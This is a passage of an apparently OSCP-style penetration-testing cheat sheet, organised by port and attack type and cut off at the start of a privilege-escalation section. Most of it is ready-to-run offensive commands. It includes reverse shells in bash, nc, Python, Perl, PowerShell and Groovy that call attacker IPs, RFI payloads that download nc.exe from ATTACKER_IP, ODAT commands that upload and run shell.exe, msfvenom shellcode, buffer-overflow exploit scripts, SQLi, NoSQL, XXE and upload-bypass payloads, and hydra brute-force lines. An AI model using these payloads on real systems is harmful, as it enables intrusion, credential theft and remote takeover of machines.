10.11.1.111 515 | snmp-check 10.11.1.111 -c public|private|community 516 | 517 | ``` 518 | 519 | ## LDAP - 389,636 520 | 521 | ``` 522 | ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" 523 | ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' 524 | ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password' 525 | patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.' 526 | ``` 527 | 528 | ## HTTPS - 443 529 | 530 | Read the actual SSL CERT to: 531 | 532 | - find out potential correct vhost to GET 533 | - is the clock skewed 534 | - any names that could be usernames for bruteforce/guessing. 535 | 536 | ``` 537 | sslscan 10.11.1.111:443 538 | ./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html 539 | nmap -sV --script=ssl-heartbleed 10.1.10.111 540 | mod_ssl,OpenSSL version Openfuck 541 | ``` 542 | 543 | ## 500 - ISAKMP IKE 544 | 545 | ``` 546 | ike-scan 10.11.1.111 547 | ``` 548 | 549 | ## 513 - Rlogin 550 | 551 | ``` 552 | apt install rsh-client 553 | rlogin -l root 10.11.1.111 554 | ``` 555 | 556 | ## 541 - FortiNet SSLVPN 557 | 558 | [Fortinet Ports Guide](https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png) 559 | 560 | [SSL VPN Leak](https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ) 561 | 562 | ## Port 554 - RTSP 563 | 564 | - Web interface, transfer images, streaming 565 | 566 | 567 | ## Port 1030/1032/1033/1038 568 | 569 | Used by RPC to connect in domain network. 570 | 571 | ## MSSQL - 1433 572 | 573 | ``` 574 | nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111 575 | use auxiliary/scanner/mssql/mssql_ping 576 | use auxiliary/scanner/mssql/mssql_login 577 | use exploit/windows/mssql/mssql_payload 578 | sqsh -S 10.11.1.111 -U sa 579 | xp_cmdshell 'date' 580 | go 581 | 582 | ``` 583 | 584 | ## Port 1521 - Oracle 585 | 586 | ``` 587 | oscanner -s 10.11.1.111 -P 1521 588 | tnscmd10g version -h 10.11.1.111 589 | tnscmd10g status -h 10.11.1.111 590 | nmap -p 1521 -A 10.11.1.111 591 | nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute 592 | MSF: good modules under auxiliary/admin/oracle and scanner/oracle 593 | 594 | ./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521 595 | ./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521 596 | ./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE 597 | 598 | Upload reverse shell with ODAT: 599 | ./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe 600 | 601 | and run it: 602 | ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe 603 | 604 | 605 | ``` 606 | 607 | ## Port 2049 - NFS 608 | 609 | ``` 610 | showmount -e 10.11.1.111 611 | 612 | If you find anything you can mount it like this: 613 | 614 | mount 10.11.1.111:/ /tmp/NFS 615 | mount -t 10.11.1.111:/ /tmp/NFS 616 | ``` 617 | 618 | ## Port 2100 - Oracle XML DB 619 | 620 | ``` 621 | FTP: 622 | sys:sys 623 | scott:tiger 624 | ``` 625 | 626 | Default passwords 627 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 628 | 629 | 630 | ## 3306 - MySQL 631 | 632 | ``` 633 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306 634 | 635 | mysql --host=10.11.1.111 -u root -p 636 | 637 | MYSQL UDF 638 | https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ 639 | ``` 640 | 641 | ## Port 3339 - Oracle web interface 642 | 643 | 644 | - Basic info about web service (apache, nginx, IIS) 645 | 646 | ## RDP - 3389 647 | 648 | ``` 649 | nmap -p 3389 --script=rdp-vuln-ms12-020.nse 650 | rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111 651 | rdesktop -u guest -p guest 10.11.1.111 -g 94% 652 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111 653 | ``` 654 | 655 | ## VNC - 5900 656 | 657 | ``` 658 | nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111 659 | ``` 660 | 661 | ## WinRM - 5985 662 | 663 | ``` 664 | https://github.com/Hackplayers/evil-winrm 665 | gem install evil-winrm 666 | evil-winrm -i 10.11.1.111 -u Administrator -p 'password1' 667 | evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder 668 | ``` 669 | 670 | ## Redis - 6379 671 | 672 | ``` 673 | https://github.com/Avinash-acid/Redis-Server-Exploit 674 | python redis.py 10.10.10.160 redis 675 | ``` 676 | 677 | ## MsDeploy - 8172 678 | 679 | ``` 680 | Microsoft IIS Deploy port 681 | IP:8172/msdeploy.axd 682 | ``` 683 | 684 | ## Webdav 685 | 686 | ``` 687 | davtest -cleanup -url http://target 688 | cadaver http://target 689 | ``` 690 | 691 | ## Unknown ports 692 | 693 | - `amap -d 10.11.1.111 8000` 694 | - netcat: makes connections to ports. Can echo strings or give shells: `nc -nv 10.11.1.111 110` 695 | - sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations 696 | - Try zone transfer for subdomains: `dig axfr @10.11.1.111 hostname.box`, `dnsenum 10.11.1.111`, `dnsrecon -d domain.com -t axfr` 697 | 698 | Try admin:admin, user:user 699 | 700 | ## Port 80 - Web server 701 | 702 | - Basics: 703 | - Navigate && robots.txt 704 | - Headers 705 | - Source Code 706 | 707 | ``` 708 | # Nikto 709 | nikto -h http://10.11.1.111 710 | 711 | # Nikto with squid proxy 712 | nikto -h 10.11.1.111 -useproxy http://10.11.1.111:4444 713 | 714 | # CMS Explorer 715 | cms-explorer -url http://10.11.1.111 -type [Drupal, WordPress, Joomla, Mambo] 716 | 717 | # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) 718 | wpscan --url http://10.11.1.111 719 | wpscan --url http://10.11.1.111 --enumerate vp 720 | wpscan --url http://10.11.1.111 --enumerate vt 721 | wpscan --url http://10.11.1.111 --enumerate u 722 | wpscan -e --url https://url.com 723 | 724 | 725 | Check IP behing WAF: 726 | https://IP.com/2020/01/22/discover-cloudflare-wordpress-ip/ 727 | pingback.xml: 728 | 729 | 730 | pingback.ping 731 | 732 | 733 | 734 | http://10.0.0.1/hello/world 735 | 736 | 737 | 738 | 739 | https://IP.com/2020/01/22/hello-world/ 740 | 741 | 742 | 743 | 744 | 745 | curl -X POST -d @pingback.xml https://ip.com/xmlrpc.php 746 | 747 | Enum User: 748 | for i in {1..50}; do curl -s -L -i https://ip.com/wordpress\?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done 749 | 750 | # Joomscan 751 | joomscan -u http://10.11.1.111 752 | joomscan -u http://10.11.1.111 --enumerate-components 753 | 754 | # Get header 755 | curl -i 10.11.1.111 756 | 757 | # Get options 758 | curl -i -X OPTIONS 10.11.1.111 759 | 760 | # With PUT option enabled: 761 | 762 | nmap -p 80 10.1.10.111 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php' 763 | 764 | curl -v -X PUT -d '' http://10.1.10.111/test/cmd.php 765 | && http://10.1.10.111/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%210.1.10.111%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 766 | 767 | # Get everything 768 | curl -i -L 10.11.1.111 769 | curl -i -H "User-Agent:Mozilla/4.0" http://10.11.1.111:8080 770 | 771 | # Check for title and all links 772 | curl 10.11.1.111 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' 773 | 774 | # Look at page with just text 775 | curl 10.11.1.111 -s -L | html2text -width '99' | uniq 776 | 777 | # Check if it is possible to upload 778 | curl -v -X OPTIONS http://10.11.1.111/ 779 | curl -v -X PUT -d '' http://10.11.1.111/test/shell.php 780 | 781 | # Simple curl POST request with login data 782 | curl -X POST http://10.11.1.11/centreon/api/index.php?action=authenticate -d 'username=centreon&password=wall' 783 | 784 | dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix 785 | 786 | site:domain.com intext:user 787 | 788 | 789 | # Firebase 790 | https://github.com/Turr0n/firebase 791 | python3 firebase.py -p 4 --dnsdumpster -l file 792 | 793 | ``` 794 | 795 | ### Url brute force 796 | 797 | ``` 798 | # Ffuf 799 | ffuf -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','xml','.log' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://10.11.1.11/mvc/FUZZ 800 | 801 | # Dirb not recursive 802 | dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt 803 | 804 | # Wfuzz 805 | wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ 806 | 807 | # GoBuster 808 | gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 809 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 810 | gobuster dir -u http://$10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt 811 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/wordlists/dirb/common.txt 812 | 813 | dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix 814 | 815 | ./dirsearch.py -u 10.10.10.157 -e php 816 | 817 | medusa -h 10.11.1.111 -u admin -P wordlist.txt -M http -m DIR:/test -T 10 818 | 819 | Crawl: 820 | 821 | dirhunt https://url.com/ 822 | hakrwaler https://url.com/ 823 | 824 | Fuzzer: 825 | 826 | ffuf -recursion -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://url.com/FUZZ 827 | 828 | dirsearch -r -f -u https://crm.comprarcasa.pt --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --request-by-hostname -t 40 829 | 830 | #IIS 831 | #ViewState: 832 | https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC 833 | 834 | #WebResource.axd: 835 | https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py 836 | 837 | #ShortNames 838 | https://github.com/irsdl/IIS-ShortName-Scanner 839 | java -jar iis_shortname_scanner.jar 2 20 http://domain.es 840 | 841 | #Jenkins 842 | JENKINSIP/PROJECT//securityRealm/user/admin 843 | JENKINSIP/jenkins/script 844 | 845 | #Groovy RCE 846 | def process = "cmd /c whoami".execute();println "${process.text}"; 847 | #Groovy RevShell 848 | String host="localhost"; 849 | int port=8044; 850 | String cmd="cmd.exe"; 851 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 852 | 853 | # Joomscan 854 | joomscan -u http://10.11.1.111 855 | joomscan -u http://10.11.1.111 --enumerate-components 856 | 857 | # PHP bypass disable_functions and open_basedir 858 | # Chankro 859 | https://github.com/TarlogicSecurity/Chankro 860 | python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html 861 | 862 | # Cookies error padding: 863 | # Get cookie structure 864 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" 865 | # Get cookie for other user (impersonation) 866 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme' 867 | ``` 868 | 869 | 870 | ### Default/Weak login 871 | 872 | Search documentation for default passwords and test them 873 | 874 | ``` 875 | site:webapplication.com password 876 | ``` 877 | 878 | ``` 879 | admin admin 880 | admin password 881 | admin 882 | admin 883 | root root 884 | root admin 885 | root password 886 | root 887 | password 888 | admin 889 | username 890 | username 891 | ``` 892 | 893 | 894 | ### LFI/RFI 895 | 896 | 897 | ``` 898 | fimap -u "http://10.11.1.111/example.php?test=" 899 | 900 | # Ordered output 901 | curl -s http://10.11.1.111/gallery.php?page=/etc/passwd 902 | /root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page= 903 | 904 | http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php 905 | http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ? 906 | ?page=php://filter/convert.base64-encode/resource=../config.php 907 | ../../../../../boot.ini 908 | 909 | amap -d 10.11.1.111 8000 910 | 911 | # LFI Windows 912 | http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00 913 | 914 | # Contaminating log files 915 | root@kali:~# nc -v 10.11.1.111 80 916 | 10.11.1.111: inverse host lookup failed: Unknown host 917 | (UNKNOWN) [10.11.1.111] 80 (http) open 918 | 919 | 920 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig 921 | 922 | # RFI: 923 | http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00 924 | Content of evil.txt: 925 | 926 | 927 | # PHP Filter: 928 | http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config 929 | 930 | # RFI over SMB (Windows) 931 | cat php_cmd.php 932 | 933 | - Start SMB Server in attacker machine and put evil script 934 | - Access it via browser (2 request attack): 935 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" 936 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234 937 | 938 | ``` 939 | 940 | ### SQL-Injection 941 | 942 | ``` 943 | # References 944 | https://www.exploit-db.com/papers/17934 945 | https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/ 946 | 947 | # Post 948 | ./sqlmap.py -r search-test.txt -p tfUPass 949 | 950 | # Get 951 | sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql 952 | 953 | # Crawl 954 | sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3 955 | 956 | # Full auto - THE GOOD ONE 957 | sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch 958 | # Columns 959 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin 960 | # Values 961 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin 962 | 963 | sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords 964 | 965 | # NoSQL 966 | ' || 'a'=='a 967 | mongodbserver:port/status?text=1 968 | 969 | #in URL 970 | username[$ne]=toto&password[$ne]=toto 971 | 972 | #in JSON 973 | {"username": {"$ne": null}, "password": {"$ne": null}} 974 | {"username": {"$gt":""}, "password": {"$gt":""}} 975 | 976 | ## SSRF 977 | 978 | web that send request to external IP's, we call 127.0.0.1:8080 / 10.1.10.111 to enum internal network 979 | 980 | chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000 981 | GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1 982 | 983 | Also we can enum ports 984 | ``` 985 | 986 | ### XSS 987 | 988 | ``` 989 | 990 | 991 | 992 | https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1 993 | 994 | " 995 | 996 | " 997 | 998 | # XXE 999 | 1000 | XML entry that reads server, Doctype, change to entity "System "file:///etc/passwd"" 1001 | 1002 | Instead POST: 1003 | 1004 | 1005 | 1007 | 1008 | ]> 1009 | Hack The &book; 1010 | 1011 | Malicious XML: 1012 | 1013 | 1014 | ]>Hack The 1015 | %26book%3B 1016 | 1017 | XXE OOB 1018 | 1019 | 1020 | %dtd;]> 1021 | %26send%3B 1022 | ``` 1023 | 1024 | ### Sql-login-bypass 1025 | 1026 | - Open Burp-suite 1027 | - Make and intercept a request 1028 | - Send to intruder 1029 | - Cluster attack. 1030 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 1031 | - Attack 1032 | - Check for response length variation 1033 | 1034 | ### Bypass image upload restrictions 1035 | 1036 | ``` 1037 | - Change extension: .pHp3 or pHp3.jpg 1038 | - Modify mimetype: Content-type: image/jpeg 1039 | - Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg 1040 | - Add gif header: GIF89a; 1041 | - All at the same time. 1042 | ``` 1043 | 1044 | ## Password brute force - last resort 1045 | 1046 | Offline local resources 1047 | 1048 | ``` 1049 | cewl 1050 | hash-identifier 1051 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 1052 | medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10 1053 | ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111 1054 | crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1 1055 | hydra -l root -P password-file.txt 10.11.1.111 ssh 1056 | hydra -P password-file.txt -v 10.11.1.111 snmp 1057 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V 1058 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V 1059 | hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V 1060 | 1061 | # SIMPLE LOGIN GET 1062 | hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V 1063 | 1064 | # GET FORM with HTTPS 1065 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!" 1066 | 1067 | # SIMPLE LOGIN POST 1068 | hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I 1069 | 1070 | # API REST LOGIN POST 1071 | hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64 1072 | 1073 | # Dictionary creation 1074 | https://github.com/LandGrey/pydictor 1075 | https://github.com/Mebus/cupp 1076 | git clone https://github.com/sc0tfree/mentalist.git 1077 | ``` 1078 | 1079 | Online crackers 1080 | 1081 | ``` 1082 | https://hashkiller.co.uk/Cracker 1083 | https://www.cmd5.org/ 1084 | https://www.onlinehashcrack.com/ 1085 | https://gpuhash.me/ 1086 | https://crackstation.net/ 1087 | https://crack.sh/ 1088 | https://hash.help/ 1089 | https://passwordrecovery.io/ 1090 | http://cracker.offensive-security.com/ 1091 | ``` 1092 | 1093 | # **Vulnerability analysis** 1094 | 1095 | ## BOF 1096 | 1097 | ``` 1098 | # BASIC GUIDE 1099 | 1. Send "A"*1024 1100 | 2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH 1101 | 3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip" 1102 | 4. Confirm the location with "B" and "C" 1103 | 5. Check for badchars instead CCCC (ESP): 1104 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 1105 | with script _badchars.py and 1106 | "!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin" 1107 | 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/): 1108 | a. !mona config -set workingfolder c:\logs\%p 1109 | b. !mona bytearray -b "\x00\x0d" 1110 | c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again 1111 | d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address) 1112 | e. In " data", before unicode chars it shows badchars. 1113 | 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE" 1114 | 1115 | 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE" 1116 | 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f 1117 | 1118 | 1119 | 7. Generate shellcode and place it: 1120 | msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00" 1121 | 1122 | msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode 1123 | 1124 | 8. Final buffer like: 1125 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode 1126 | 1127 | ``` 1128 | 1129 | 1130 | 1131 | ``` 1132 | ################ sample 1 ################################################ 1133 | #!/usr/bin/python 1134 | 1135 | import socket,sys 1136 | 1137 | if len(sys.argv) != 3: 1138 | print("usage: python fuzzer.py 10.11.1.111 PORT") 1139 | exit(1) 1140 | 1141 | payload = "A" * 1000 1142 | 1143 | ipAddress = sys.argv[1] 1144 | port = int(sys.argv[2]) 1145 | 1146 | try: 1147 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 1148 | s.connect((ipAddress, port)) 1149 | s.recv(1024) 1150 | print "Sending payload" 1151 | s.send(payload) 1152 | print "Done" 1153 | s.close() 1154 | except: 1155 | print "Error" 1156 | sys.exit(0) 1157 | 1158 | ################ sample 2 ################################################ 1159 | #!/usr/bin/python 1160 | import time, struct, sys 1161 | import socket as so 1162 | 1163 | try: 1164 | server = sys.argv[1] 1165 | port = 5555 1166 | except IndexError: 1167 | print "[+] Usage %s host" % sys.argv[0] 1168 | sys.exit() 1169 | 1170 | req1 = "AUTH " + "\x41"*1072 1171 | s = so.socket(so.AF_INET, so.SOCK_STREAM) 1172 | try: 1173 | s.connect((server, port)) 1174 | print repr(s.recv(1024)) 1175 | s.send(req1) 1176 | print repr(s.recv(1024)) 1177 | except: 1178 | print "[!] connection refused, check debugger" 1179 | s.close() 1180 | ``` 1181 | 1182 | 1183 | 1184 | ## Find xploits - Searchsploit and google 1185 | 1186 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 1187 | 1188 | ```bash 1189 | site:exploit-db.com apache 2.4.7 1190 | 1191 | # Remove dos-exploits 1192 | 1193 | searchsploit Apache 2.4.7 | grep -v '/dos/' 1194 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" 1195 | 1196 | # Only search the title (exclude the path), add the -t 1197 | searchsploit -t Apache | grep -v '/dos/' 1198 | ``` 1199 | 1200 | ## Reverse Shells 1201 | 1202 | ```bash 1203 | # Linux 1204 | bash -i >& /dev/tcp/10.11.1.111/4443 0>&1 1205 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f 1206 | nc -e /bin/sh 10.11.1.111 4443 1207 | 1208 | # Python 1209 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 1210 | 1211 | __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\ 1212 | 1213 | # Perl 1214 | perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1215 | 1216 | # Windows 1217 | nc -e cmd.exe 10.11.1.111 4443 1218 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 1219 | 1220 | # PHP most simple Linux 1221 | $sock, 1=>$sock, 2=>$sock), $pipes);?> 1222 | ``` 1223 | 1224 | # **Privilege escalation** 1225 | 1226 | ## Common 1227 | 1228 | ``` 1229 | # Docker 1230 | https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/ 1231 | 1232 | ``` 1233 | 1234 | ### Set up Webserver 1235 | 1236 | ``` 1237 | python -m SimpleHTTPServer 8080 1238 | https://github.com/sc0tfree/updog 1239 | updog 1240 | ``` 1241 | 1242 | ### Set up FTP Server 1243 | 1244 | ``` 1245 | # Install pyftpdlib 1246 | pip install pyftpdlib 1247 | 1248 | # Run (-w flag allows 